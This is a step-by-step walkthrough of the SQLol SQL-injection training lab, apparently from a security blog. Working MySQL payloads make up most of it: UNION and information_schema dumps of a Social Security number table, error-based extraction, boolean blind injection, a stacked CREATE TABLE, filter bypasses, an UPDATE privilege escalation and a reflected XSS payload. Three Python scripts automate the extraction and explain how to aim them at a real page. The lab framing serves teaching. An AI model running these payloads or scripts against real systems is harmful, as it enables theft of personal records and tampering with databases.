SQLol has 14 challenges in total (0 through 13), and we are going to break them one by one. In every level the page shows the query it runs, with the injection point marked 【…】; the target is a MySQL database, so the payloads use MySQL syntax (# for the line comment, information_schema, 0x hex literals, extractvalue/updatexml).


Challenge 0

The goal is to make the query return all user names, not just one.

SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC

The injection point is at [1], inside a quoted string. Close the string, append a UNION that pulls every row from users, and comment out the rest of the statement (otherwise the trailing GROUP BY and ORDER BY would be glued onto the injected text):

' UNION SELECT username FROM users#

Every user name is returned.

Challenge 1

The goal is to find the table that holds Social Security numbers and extract its contents.

SELECT username FROM users WHERE username = 【'1'】 GROUP BY username ORDER BY username ASC

The injection point is at [1]. We first need to know which tables and columns exist; information_schema answers that. Each payload makes the original WHERE clause false (and 1=2) so that only the UNION rows come back, selects exactly one column because the original SELECT returns one, and ends with # to drop the trailing GROUP BY / ORDER BY.

Construct the POC, one step at a time.

List the schemas:

' and 1=2 UNION SELECT table_schema FROM information_schema.tables#

List the tables in the sqlol schema:

' and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema='sqlol'#

List the columns of the ssn table:

' and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name='ssn'#

Dump name and SSN, joined with 0x7e (a tilde) so the two fields are easy to split:

' and 1=2 UNION SELECT concat(name,0x7e,ssn) FROM ssn#

At this point you have the information you want.

Challenge 2

Same goal as Challenge 1: find the Social Security number table and extract its contents.

SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC

The injection point is at [1]. The approach is the same as in Challenge 1, except that this is a numeric injection (there is no quote to close) and single quotes are filtered, so string literals are written as hex numbers instead: 0x73716C6F6C is 'sqlol' and 0x73736E is 'ssn'. MySQL compares a hex literal against a string column as a string, so no quotes are needed.

Construct the POC.

List the schemas:

1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#

List the tables in the sqlol schema:

1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE table_schema=0x73716C6F6C#

List the columns of the ssn table:

1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#

Dump the records:

1 and 1=2 UNION SELECT concat(name,0x7e,ssn) FROM ssn#

At this point you have the information you want.

Challenge 3

Same goal: find the Social Security number table and extract its contents.

The difference from Challenge 1 is that only one row of the result is displayed (detailed error messages are still shown), so a UNION that returns many rows shows only its first. Use LIMIT to fetch the records one at a time, increasing the offset on each request.

Construct the POC:

' UNION SELECT concat(name,':',ssn) FROM ssn LIMIT 0,1#

Then LIMIT 1,1, LIMIT 2,1, and so on until no row comes back. The # is needed: without it the LIMIT would be followed by the original ' GROUP BY ... and the statement would not parse.

Challenge 4

The goal is again to find the Social Security number table and extract its contents, this time without using blind-injection techniques.

Hint: detailed error messages are displayed, so use error-based injection. ExtractValue() raises an XPath syntax error that quotes the offending expression, so anything concatenated behind an invalid leading character (0x5c, a backslash, or 0x01) is reflected back in the error message.

Construct the POC. First confirm the technique with the current user:

' and extractvalue(1,concat(0x5c,(select user())))#

Then pull records from ssn one at a time:

' and extractvalue(1,concat(0x01,(select concat(name,':',ssn) from ssn limit 0,1)))#

One caveat: MySQL quotes at most 32 characters of the XPath string in this error, so longer values have to be read in pieces with substr().
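The following Python script is an added example, not code from the original write-up or from SQLol. It shows how the Challenge 4 payload is driven when the value is longer than the 32 characters the error message quotes: the wanted subquery is wrapped in substr() and read chunk by chunk. It assumes a function that submits a payload and returns the page text; here that is replaced by fake_mysql, a simulator with constructed sample records, so the script runs offline. The ssn table, the column names and the sample rows are all assumptions.

```python
import re

# Constructed sample data standing in for the ssn table; not real records.
FAKE_SSN_ROWS = "Herp Derper:123-45-6789|Herpina Derpina:987-65-4321"
# MySQL quotes at most this many characters of the bad XPath expression.
XPATH_ERROR_LIMIT = 32
MARKER = "~"  # 0x7e, the invalid leading character that forces the error


def build_payload(inner_query, start, length):
    """Error-based payload in the Challenge 4 style, reading `length` chars of
    the subquery result starting at 1-based position `start`."""
    return ("' and extractvalue(1,concat(0x7e,substr((%s),%d,%d)))#"
            % (inner_query, start, length))


def parse_error(page_text):
    """Pull the reflected value out of MySQL's XPath error, or None if the
    page shows no such error."""
    m = re.search(r"XPATH syntax error: '" + MARKER + r"([^']*)'", page_text)
    return m.group(1) if m else None


def extract_all(send, inner_query, chunk=XPATH_ERROR_LIMIT - len(MARKER)):
    """Walk the value in substr() chunks; a short or empty piece means the
    end of the string has been reached."""
    result, start = "", 1
    while True:
        piece = parse_error(send(build_payload(inner_query, start, chunk)))
        if not piece:
            break
        result += piece
        if len(piece) < chunk:
            break
        start += chunk
    return result


def fake_mysql(payload):
    """Simulated vulnerable page (assumption, stands in for an HTTP request):
    reads start/length out of the substr() call and answers with the error
    MySQL would raise, with the XPath string cut at 32 characters."""
    m = re.search(r"substr\(\(.*\),(\d+),(\d+)\)\)\)#$", payload)
    if not m:
        return "Query OK"
    start, length = int(m.group(1)), int(m.group(2))
    piece = FAKE_SSN_ROWS[start - 1:start - 1 + length]
    return "XPATH syntax error: '%s'" % (MARKER + piece)[:XPATH_ERROR_LIMIT]


if __name__ == "__main__":
    query = "select group_concat(name,0x3a,ssn separator 0x7c) from ssn"
    print(extract_all(fake_mysql, query))
```

Against the real page, replace fake_mysql with a function that sends the payload in the vulnerable parameter and returns the response body; the chunk size stays 31 because the marker occupies one of the 32 quoted characters.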

 

Challenge 5

Same goal: find the Social Security number table and extract its contents.

Hint: neither error messages nor query output are shown, so this is boolean-based blind injection. The page only tells you whether the WHERE clause was true (every user name comes back) or false (nothing comes back), and that one bit per request is the oracle.

Construct the POC. First find the length of the database name:

1' or length(database())=5#

Then test it character by character, comparing the ASCII value at each position (115 is 's'):

1' or ascii(mid(database(),1,1))=115#

Increase the position and walk through the candidate values; the same pattern, with a subquery against ssn in place of database(), extracts the records. Doing this by hand is slow, which is why blind injection is normally scripted.
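The script below is an added example, not part of the original write-up or of SQLol. It automates the Challenge 5 procedure and goes one step beyond it: instead of testing ascii(...)=N for every candidate value it binary-searches the ASCII value with > comparisons, so each character costs seven requests instead of up to 127. It assumes a function that submits a payload and reports whether the page showed the user list; here that is fake_page, a simulator whose constructed database name is sqlol, so the script runs offline.

```python
import re

# Constructed stand-in for the value of database(); the real server decides this.
FAKE_DATABASE = "sqlol"


def fake_page(payload):
    """Simulated Challenge 5 page (assumption, stands in for an HTTP request):
    True when the injected condition is true (every user name comes back),
    False otherwise. It understands only the two payload shapes built below."""
    m = re.fullmatch(r"1' or length\(database\(\)\)=(\d+)#", payload)
    if m:
        return len(FAKE_DATABASE) == int(m.group(1))
    m = re.fullmatch(r"1' or ascii\(mid\(database\(\),(\d+),1\)\)>(\d+)#", payload)
    if m:
        pos, value = int(m.group(1)), int(m.group(2))
        return pos <= len(FAKE_DATABASE) and ord(FAKE_DATABASE[pos - 1]) > value
    raise ValueError("unsupported payload: %r" % payload)


class CountingOracle:
    """Wraps an oracle and counts requests, to show the cost of the search."""

    def __init__(self, oracle):
        self.oracle, self.calls = oracle, 0

    def __call__(self, payload):
        self.calls += 1
        return self.oracle(payload)


def find_length(oracle, max_len=64):
    """Step 1 of the write-up: length(database())=N for increasing N."""
    for n in range(1, max_len + 1):
        if oracle("1' or length(database())=%d#" % n):
            return n
    return None


def find_char(oracle, pos):
    """Step 2, generalised: binary search on the ASCII value of the character
    at position pos, using > instead of = (7 requests per character)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("1' or ascii(mid(database(),%d,1))>%d#" % (pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_database(oracle):
    """Length first, then every character; returns the recovered name."""
    length = find_length(oracle)
    if length is None:
        return ""
    return "".join(find_char(oracle, i) for i in range(1, length + 1))


if __name__ == "__main__":
    oracle = CountingOracle(fake_page)
    print(extract_database(oracle), "recovered in", oracle.calls, "requests")
```

To read the ssn table instead, swap database() for a subquery such as (select concat(name,':',ssn) from ssn limit 0,1) in both payload templates and in the simulator's regexes; the search logic is unchanged.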

 

Challenge 6

The goal is to create a new table called "IPwntyourDB" using a stacked query.

Construct the POC. Close the string, terminate the statement with a semicolon, append the CREATE TABLE, and comment out the rest:

Herp Derper'; create table ipwntyourdb(id VARCHAR(100) NOT NULL)#

which the server executes as:

SELECT username FROM users WHERE username = 'Herp Derper'; create table ipwntyourdb(id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC

Stacked queries only work when the application's database driver accepts several statements in one call; this level is configured that way, but many drivers (PHP's mysql_query, for one) refuse a second statement, so always check before relying on the technique.

Challenge 7

The goal is to find the Social Security number table and extract its contents without deleting anything from the database.

Hint: the injection point is inside a DELETE statement, errors are displayed, and the query's result is not.

POC: make the WHERE clause raise an error with updatexml() before any row can match. The error aborts the DELETE, so nothing is removed, and the error message carries the data:

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '

which yields:

DELETE FROM users WHERE username = '' or updatexml(1,concat(0x7e,(version()),0x7e),0) or ''

Replace version() with a subquery such as (select concat(name,':',ssn) from ssn limit 0,1) to read the records, exactly as in Challenge 4; the 32-character limit on the reflected value applies here too.

Challenge 8

Same goal: find the Social Security number table and extract its contents.

Hint: a blacklist filter is in place that blocks keywords and characters such as union, select, where, and, or, and #, so it has to be bypassed. The filter is case-sensitive, so mixed-case keywords pass. Because # is blocked, the payload cannot comment out the original closing quote; instead it ends by reopening a string, so that the original quote closes it and the statement stays valid.

POC:

' uNion seLect concat(name,':',ssn) from ssn uNion selEct null from users whEre username='

Challenge 9

The goal is to inject into an UPDATE statement so that it sets isadmin to 1 for the user with id 3, that is, to make the server run the equivalent of:

UPDATE users SET isadmin = 1 WHERE id = 3

How do we attach that to the original injection point, which sits in the value assigned to username, and get it to execute? Close the string, append a second assignment to the SET list, supply our own WHERE clause, and comment out the rest:

admin', isadmin = 1 WHERE id = 3#

so the statement becomes:

UPDATE users SET username = 'admin', isadmin = 1 WHERE id = 3#

User 3 is renamed to admin and gets isadmin = 1. Note that the original WHERE clause is commented out; without our own WHERE id = 3 the UPDATE would touch every row.

Challenge 10

The goal is to get a Social Security number from the database.

SELECT [1] FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

The injection point is the column list of the SELECT. As in Challenge 8, mixed case is used to get past a case-sensitive keyword filter.

POC:

seLect concat(name,':',ssn) from ssn#

Check: dropped straight into the column position this reads SELECT seLect ..., which is not valid SQL. For the statement to parse, the select has to be wrapped as a scalar subquery, (seLect concat(name,':',ssn) from ssn limit 0,1), or attached to a column name with uNion, such as username from users uNion seLect concat(name,':',ssn) from ssn#.

Challenge 11

The goal is to get a Social Security number from the database.

The injection point is in the ORDER BY clause, where a UNION cannot be used, so the data is forced into an error message with the floor(rand(0)*2) duplicate-key trick: grouping by a value that concat()s the wanted data with a rand(0)-derived number makes MySQL evaluate the group key twice for the same row and fail with "Duplicate entry '...' for key 'group_key'", echoing the data in the message.

POC (the injected part is everything between ORDER BY and ASC):

SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1))) ASC

0x27202020 is a quote followed by three spaces, a separator that makes the value stand out in the error text. Replace version() with (select concat(name,':',ssn) from ssn limit 0,1) to get a record.

Challenge 12

The goal is to use the SQL injection vulnerability to perform a reflected cross-site scripting attack: the error page echoes the failing query without HTML-escaping it, so markup placed in the payload is rendered by the browser.

POC:

1' and <script>alert(11)</script>#

The server tries to run:

SELECT username FROM users WHERE username = '1' and <script>alert(11)</script>#' GROUP BY username ORDER BY username ASC

The query fails, the error page reflects it, the alert pops up, and what remains visible in the echoed query is:

SELECT username FROM users WHERE username = '1' and #' GROUP BY username ORDER BY username ASC

because the browser has consumed the script element. The JavaScript has run in the browser.

Challenge 13

The goal is to retrieve all user names from the database.

POC:

Select username from users where username LIKE '2' or 1=1

If single quotes are filtered, the injection point inside the LIKE pattern can still be used for blind extraction through the pattern's wildcards, which need no quotes at all:

% matches zero or more characters

_ matches exactly one character

([] for one of a listed set of characters and [^] for a character not in the set are SQL Server syntax; MySQL's LIKE only has % and _, so use REGEXP there if a character class is needed.)

Each guess is confirmed by whether the page returns a row.

1. Get the first character of a user name:

Select username from users where username LIKE 'P%' LIMIT 0,1

2. Determine the length of the name beginning with P (one underscore for each remaining character):

Select username from users where username LIKE 'P__________' LIMIT 0,1

3. Keep guessing, extending the prefix one character at a time until the pattern with no trailing % matches.
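The script below is an added example and not part of the original write-up or of SQLol. It automates the three steps above against a simulated Challenge 13 page and generalises step 3 to a full enumeration: the prefix is grown one character at a time and the search branches wherever several names share a prefix, so every user name is recovered, not just one. It assumes a function that submits a LIKE pattern and reports whether a row came back; here that is fake_page, with constructed user names. Two details a practitioner should keep in mind are built in: literal % and _ in a guess must be escaped, and LIKE is case-insensitive under MySQL's default collation, so names are recovered in the alphabet's case.

```python
import re
import string

# Constructed user names standing in for the users table; not real data.
FAKE_USERS = ["Herp Derper", "Herpina Derpina", "admin_1"]


def like_to_regex(pattern):
    """Translate a MySQL LIKE pattern (default ESCAPE '\\') into a regex."""
    out, i = "", 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            out += re.escape(pattern[i + 1])
            i += 2
            continue
        out += ".*" if ch == "%" else "." if ch == "_" else re.escape(ch)
        i += 1
    return out + r"\Z"


def fake_page(pattern):
    """Simulated Challenge 13 page (assumption, stands in for an HTTP request):
    True when some user name matches the LIKE pattern. Case-insensitive, like
    LIKE under MySQL's default collation."""
    rx = re.compile(like_to_regex(pattern), re.IGNORECASE | re.DOTALL)
    return any(rx.match(user) for user in FAKE_USERS)


def escape_like(text):
    """Literal text inside a LIKE pattern: % and _ must be escaped or they act
    as wildcards."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def name_length(oracle, first_char, max_len=64):
    """Step 2 of the write-up: first_char followed by N-1 underscores matches
    a name of exactly N characters. Returns the shortest such N."""
    for n in range(1, max_len + 1):
        if oracle(escape_like(first_char) + "_" * (n - 1)):
            return n
    return None


ALPHABET = string.ascii_lowercase + string.digits + " _"


def enumerate_names(oracle, alphabet=ALPHABET, prefix=""):
    """Step 3, generalised: grow the prefix one character at a time and branch
    wherever several names share it. A prefix is a complete name when the
    pattern without a trailing % matches."""
    found = []
    if prefix and oracle(escape_like(prefix)):
        found.append(prefix)
    for ch in alphabet:
        if oracle(escape_like(prefix + ch) + "%"):
            found.extend(enumerate_names(oracle, alphabet, prefix + ch))
    return found


if __name__ == "__main__":
    print(name_length(fake_page, "h"))
    print(enumerate_names(fake_page))
```

Each level of the prefix walk costs one request per alphabet character, so keep the alphabet as small as the data allows; adding uppercase letters would only produce duplicates here, because the match is case-insensitive.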

About me: a network security enthusiast dedicated to sharing original, practical content. Follow my personal WeChat public account, Bypass--, for more articles.